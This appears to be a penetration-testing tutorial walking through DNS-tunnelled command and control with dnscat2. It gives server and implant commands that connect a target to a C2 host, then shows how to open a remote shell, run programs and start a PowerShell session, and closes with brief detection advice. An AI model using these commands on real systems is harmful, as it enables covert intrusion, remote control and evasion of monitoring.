Even in the most restricted environments DNS traffic should be allowed to resolve internal or external domains. This can be used as a communication channel between a target host and the command and control server. Commands and data are included inside DNS queries and responses therefore detection is difficult since arbitrary commands are hiding in legitimate traffic.

Implementation of this technique is possible with the use of Dnscat2 which can create a command and control channel over the DNS protocol. This tool uses a client (implant) which is based in C and it needs to be executed on the target in order for the server to receive a connection. Traffic is transmitted in an encrypted form and also it supports authentication via pre-shared secrets.

Installation of this tool is easy by following the commands below from a Kali Linux 2.0 machine.

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
bundle install
Dnscat2 - Download and Installation

Dnscat2 – Download and Installation

The command and control server can initiated by using the following command.

ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.1.169" --no-cache
Dnscat2 - Server

Dnscat2 – Server

A compiled version of the client (implant) for Windows systems can be downloaded directly from here. From the command prompt of the target the only requirement is to specify the DNS server in order to establish a connection with the C2 (Command & Control) server.

dnscat2-v0.07-client-win32.exe --dns server=192.168.1.169
Dnscat2 - Windows Client

Dnscat2 – Windows Client

From Dnscat2 the red teamer can start the interaction with the existing session that has been created:

session -i 1
Dnscat2 - Interactive Session

Dnscat2 – Interactive Session

By executing “help” a list of available commands for usage can be retrieved:

Dnscat2 - List of Commands

Dnscat2 – List of Commands

Part of the functionality of dnscat2 is to upload and download files, execute other programs and obtaining a remote shell.

Obtaining a shell is easy with the “shell” command which will open another session:

Dnscat2 - Shell

Dnscat2 – Shell

The following output will appear on the command prompt of the target:

Dnscat2 - Command Shell Request

Dnscat2 – Command Shell Request

The shell will be interactive and fast and all the commands will be transferred over DNS traffic:

Dnscat2 - Executing Shell Commands

Dnscat2 – Executing Shell Commands

Launching another program remotely is possible by calling the executable:

exec notepad.exe
Dnscat2 - Start New Process

Dnscat2 – Start New Process

Luke Baggett developed a PowerShell version of the implant which have been introduced and described in the blackhillsinfosec website. The commands are the same but additional features have been added like interactive PowerShell session and ability to  run scripts directly from memory.

The following command needs to be executed from a PowerShell session on the target:

PS C:\> start-Dnscat2 -Domain pentestlab -DNSServer 192.168.1.169

It is also possible to establish a direct PowerShell session by running the following:

exec psh
Dnscat2 - PowerShell

Dnscat2 – PowerShell

A new console will created with the ability to execute PowerShell commands and scripts:

Dnscat2 - PowerShell Command

Dnscat2 – PowerShell Command

Conclusion

There are various advantages of command and control over DNS with dnscat2. Some of them are:

  • Support of multiple sessions
  • Traffic encryption
  • Protection from MiTM attacks with secret key
  • Run PowerShell scripts directly from memory
  • Stealthy

Since detection is difficult due to the fact that arbitrary commands are transferred behind legitimate DNS traffic emphasis should be given to monitor the length of DNS queries and to allow hosts to communicate only with DNS servers that are trusted.

References

https://github.com/iagox86/dnscat2

https://github.com/lukebaggett/dnscat2-powershell

https://www.blackhillsinfosec.com/powershell-dns-command-control-with-dnscat2-powershell/

Advertisements